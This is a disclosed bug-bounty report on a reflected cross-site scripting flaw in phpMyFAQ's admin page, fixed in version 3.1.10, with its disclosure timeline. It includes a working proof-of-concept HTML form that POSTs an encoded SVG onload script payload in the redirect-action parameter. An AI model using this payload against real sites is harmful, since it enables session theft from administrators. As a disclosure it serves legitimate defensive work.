Reflected XSS Which can help in any CSRF Vulnerability in thorsten/phpmyfaq

Valid

Reported on

Dec 13th 2022


Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept

The HTML page below triggers the XSS through a POST request (the reflected parameter is redirect-action):

<html>
  <head>
    <title>XSS POC By AggressiveUser</title>
  </head>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://roy.demo.phpmyfaq.de/admin/index.php" method="POST">
      <!-- redirect-action is the parameter reflected without encoding -->
      <input type="hidden" name="redirect&#45;action" value="AggressiveUser&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;112233&#41;&gt;" />
      <center><input type="submit" value="Click Here for Trigger XSS" /></center>
    </form>
  </body>
</html>

BurpSuite proof of concept of the POST-method XSS:

#YO Maintainer :) Long Time No SEE !

Impact

An attacker can execute JavaScript in the victim's browser: steal the session cookie, redirect the user to any URL, and lots of other FUN.

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 5 months ago
thorsten/phpmyfaq maintainer has acknowledged this report 5 months ago
Thorsten Rinne gave praise 5 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Thorsten Rinne validated this vulnerability 5 months ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne marked this as fixed in 3.1.10 with commit 3872e7 5 months ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jan 31st 2023
AggressiveUser
4 months ago

Researcher


Hi @admin, as I can see, there is one message: "This vulnerability has been assigned a CVE".

But I can't find any CVE attached to this report.

Pavlos
4 months ago

Admin


On Jan 31st you will see it :)

AggressiveUser
4 months ago

Researcher


ok thanks @admin <3

Thorsten Rinne published this vulnerability 4 months ago